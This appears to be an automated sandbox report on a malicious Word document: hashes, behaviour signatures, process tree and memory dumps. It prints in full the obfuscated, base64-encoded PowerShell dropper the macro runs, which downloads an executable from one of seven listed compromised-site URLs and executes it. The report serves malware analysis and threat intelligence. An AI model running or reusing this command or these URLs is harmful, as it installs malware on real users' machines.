Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:05

General

  • Target

    65a199d9d093328880fffe341f9b20ef_JaffaCakes118.doc

  • Size

    193KB

  • MD5

    65a199d9d093328880fffe341f9b20ef

  • SHA1

    a117d4ca2294323d2bc3adcdd6e8948617290233

  • SHA256

    0afb7c179025ddfba82f253e521171894baccb916aadce3f0c6cd8014f706940

  • SHA512

    92ba6b5e1c69a6499122afa7bbc8388c6f1401df76c9bfe6cc6627349a72bc2fac0f703e79fbf19f4b2af1fe88cb922f90a63eb72cf64a3aae01af1db33b5089

  • SSDEEP

    1536:+rdi1Ir77zOH98Wj2gpng9+a9jk1q9Dba/qrHEs+nPyNdOx74en:+rfrzOH98ipghva/qTX+nPyLOBBn

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://zplusshopping.com/wp-content/plugins/8ek/

exe.dropper

https://www.cupgel.com/__MACOSX/3/

exe.dropper

http://freespiritmind.com/MASD/HowTo/css/J/

exe.dropper

http://crewnecksusa.com/wp-content/NJ/

exe.dropper

http://www.dougsuniverse.com/pics/yL8/

exe.dropper

https://idilsoft.com/admin/B/

exe.dropper

https://guhaasmart.com/wp-content/s/

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\65a199d9d093328880fffe341f9b20ef_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1728
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2904
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -en JABHAHkAZwBwAG8AaAA1AD0AKAAnAE8AYQAnACsAJwBzACcAKwAoACcAaQAnACsAJwBzADMAcAAnACkAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAGUAUgBwAFIAbwBGAEkATABlAFwAVwBjADUAUwB1AHcAZABcAGkASgB6AGUAcgBsAEQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIARQBDAHQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAHUAUgBJAGAAVABgAHkAYABwAGAAUgBvAHQAbwBgAGMAbwBsACIAIAA9ACAAKAAoACcAdABsACcAKwAnAHMAMQAyACcAKQArACgAJwAsACAAJwArACcAdABsACcAKQArACgAJwBzACcAKwAnADEAMQAsACcAKQArACgAJwAgACcAKwAnAHQAbABzACcAKQApADsAJABBAGwAMQBvADQAcwAwACAAPQAgACgAKAAnAEYAMQAnACsAJwByAHgAJwApACsAKAAnAGcANAAnACsAJwB2ACcAKQArACcANwAnACkAOwAkAFkAMQBjAGgAaABwAHoAPQAoACgAJwBCACcAKwAnAGYAZgBsAHQAJwApACsAJwB2ACcAKwAnAHkAJwApADsAJABNAHgAcQBiAGwANwBsAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAoACcAZABWAFgAJwArACcAVwBjADUAJwApACsAJwBzACcAKwAnAHUAJwArACgAJwB3AGQAJwArACcAZAAnACkAKwAoACcAVgBYACcAKwAnAEkAJwApACsAKAAnAGoAJwArACcAegBlACcAKwAnAHIAbABkAGQAVgBYACcAKQApACAAIAAtAHIARQBQAGwAQQBDAEUAIAAoAFsAQwBoAEEAUgBdADEAMAAwACsAWwBDAGgAQQBSAF0AOAA2ACsAWwBDAGgAQQBSAF0AOAA4ACkALABbAEMAaABBAFIAXQA5ADIAKQArACQAQQBsADEAbwA0AHMAMAArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAFgAOQB0AGQANgBfAHUAPQAoACcAQQAnACsAJwA4ADMAJwArACgAJwA1ACcAKwAnAHEAcgBxACcAKQApADsAJABRAHUAMwB5AGMANQBqAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAVAAuAFcARQBCAEMAbABJAEUATgB0ADsAJABWADcAOABzAHUAaABmAD0AKAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKwAoACcAOgAvACcAKwAnAC8AJwApACsAJwB6ACcAKwAnAHAAJwArACcAbAB1ACcAKwAnAHMAJwArACcAcwAnACsAKAAnAGgAJwArACcAbwBwAHAAJwArACcAaQBuAGcAJwApACsAJwAuAGMAJwArACcAbwAnACsAKAAnAG0ALwAnACsAJwB3AHAALQAnACkAKwAnAGMAJwArACcAbwBuACcAKwAnAHQAZQAnACsAJwBuAHQAJwArACgAJwAvAHAAJwArACcAbAAnACkAKwAoACcAdQBnAGkAJwArACcAbgAnACkAKwAnAHMALwAnACsAKAAnADgAZQBrACcAKwAnAC8AJwApACsAKAAnACoAaAAnACsAJwB0AHQAcAAnACkAKwAnAHMAJwArACgAJwA6AC8AJwArACcALwB3ACcAKQArACcAdwB3ACcAKwAnAC4AYwAnACsAKAAnAHUAcABnAGUAJwArACcAbAAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwBfACcAKwAnAF8ATQBBAEMATwBTAFgAJwArACcALwAzACcAKwAnAC8AKgBoAHQAJwApACsAJwB0ACcAKwAoACcAcAA6ACcAKwAnAC8ALwAnACkAKwAnAGYAcgAnACsAKAAnAGUAZQBzACcAKwAnAHAAJwApACsAJwBpACcAKwAoACcAcgBpAHQAbQBpAG4AZAAnACsAJwAuAGMAJwArACcAbwBtACcAKQArACgAJwAvACcAKwAnAE0AQQBTAEQALwBIACcAKwAnAG8AdwAnACkAKwAoACcAVAAnACsAJwBvAC8AYwBzACcAKQArACcAcwAnACsAKAAnAC8ASgAvACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAOgAnACsAJwAvAC8AYwByACcAKQArACcAZQAnACsAKAAnAHcAJwArACcAbgBlACcAKQArACgAJwBjACcAKwAnAGsAcwAnACkAKwAoACcAdQAnACsAJwBzAGEAJwApACsAKAAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAnAC8AJwArACcAdwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuAHQAJwApACsAJwBlAG4AJwArACgAJwB0AC8ATgBKACcAKwAnAC8AKgAnACsAJwBoAHQAdAAnACkAKwAnAHAAOgAnACsAKAAnAC8ALwB3ACcAKwAnAHcAdwAuACcAKwAnAGQAbwAnACkAKwAnAHUAZwAnACsAJwBzAHUAJwArACgAJwBuAGkAJwArACcAdgBlACcAKQArACcAcgBzACcAKwAnAGUALgAnACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AJwApACsAJwBwAGkAJwArACcAYwBzACcAKwAnAC8AeQAnACsAKAAnAEwAOAAvACcAKwAnACoAJwArACcAaAB0AHQAcAAnACkAKwAoACcAcwA6AC8ALwBpAGQAaQBsACcAKwAnAHMAJwArACcAbwAnACkAKwAoACcAZgB0AC4AJwArACcAYwAnACkAKwAnAG8AJwArACgAJwBtAC8AYQBkAG0AaQAnACsAJwBuAC8AQgAvACcAKwAnACoAaAAnACsAJwB0ACcAKQArACcAdABwACcAKwAnAHMAJwArACgAJwA6ACcAKwAnAC8ALwBnAHUAJwArACcAaABhAGEAJwArACcAcwAnACkAKwAnAG0AJwArACcAYQAnACsAJwByACcAKwAoACcAdAAuACcAKwAnAGMAbwBtACcAKQArACgAJwAvAHcAJwArACcAcAAnACkAKwAnAC0AYwAnACsAJwBvAG4AJwArACcAdAAnACsAJwBlACcAKwAnAG4AJwArACcAdAAnACsAJwAvACcAKwAnAHMALwAnACkALgAiAFMAcABsAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASAA3AHEAcgAyADIAbgA9ACgAJwBVAGEAJwArACgAJwBxACcAKwAnAHcAagBuAHkAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABFAGYAeQBuADEAXwBrACAAaQBuACAAJABWADcAOABzAHUAaABmACkAewB0AHIAeQB7ACQAUQB1ADMAeQBjADUAagAuACIAZABgAE8AVwBuAGAATABvAEEAZABmAGkAbABlACIAKAAkAEUAZgB5AG4AMQBfAGsALAAgACQATQB4AHEAYgBsADcAbAApADsAJABWAG8AawA3AGIANAB6AD0AKAAoACcARQBpACcAKwAnAGgAawAnACkAKwAoACcAeAAnACsAJwA3ADMAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQATQB4AHEAYgBsADcAbAApAC4AIgBsAGAAZQBgAE4AZwBUAGgAIgAgAC0AZwBlACAAMwAxADcAMQA2ACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAE0AeABxAGIAbAA3AGwAKQA7ACQAQgBhAHgAZgBnAHMAZgA9ACgAJwBZAGsAJwArACcANQAnACsAKAAnAHUAJwArACcAOQB2AHgAJwApACkAOwBiAHIAZQBhAGsAOwAkAFIAYQBiAGgAdQBjAHMAPQAoACgAJwBNACcAKwAnAGwAdAAnACkAKwAoACcAdQAnACsAJwBjADAAOQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwA5AGgAbQBiAF8AeAA9ACgAKAAnAEQAbAAnACsAJwBkACcAKQArACgAJwBzADYAbwAnACsAJwBoACcAKQApAA==
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2472

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      bd269363dff6ceaec536e0dbe9fcafdc

      SHA1

      1330a23e344707610f52a7c8e7dae9254092b47d

      SHA256

      6517a57bc3b48f5a20a4518ea895cc892dc5ae3520126288150c656c6c284479

      SHA512

      c707b24ff26397be3988b014051b60ad440360c8eee4ebd406fd580c4bc5d87df1c9284634c378b23407bb398233db62583eae40d31dd252923c15ade3f5a0ec

    • memory/1728-33-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-46-0x000000007176D000-0x0000000071778000-memory.dmp
      Filesize

      44KB

    • memory/1728-6-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-7-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-8-0x0000000005E00000-0x0000000005F00000-memory.dmp
      Filesize

      1024KB

    • memory/1728-21-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-20-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-19-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-18-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-17-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-16-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-15-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-14-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-32-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-12-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-11-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-10-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-9-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-69-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1728-2-0x000000007176D000-0x0000000071778000-memory.dmp
      Filesize

      44KB

    • memory/1728-13-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-31-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-30-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-29-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-28-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-27-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-26-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-25-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-24-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-23-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-22-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-70-0x000000007176D000-0x0000000071778000-memory.dmp
      Filesize

      44KB

    • memory/1728-34-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-0-0x000000002FA01000-0x000000002FA02000-memory.dmp
      Filesize

      4KB

    • memory/1728-47-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-49-0x00000000003F0000-0x00000000004F0000-memory.dmp
      Filesize

      1024KB

    • memory/1728-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2472-41-0x0000000001F40000-0x0000000001F48000-memory.dmp
      Filesize

      32KB

    • memory/2472-40-0x000000001B820000-0x000000001BB02000-memory.dmp
      Filesize

      2.9MB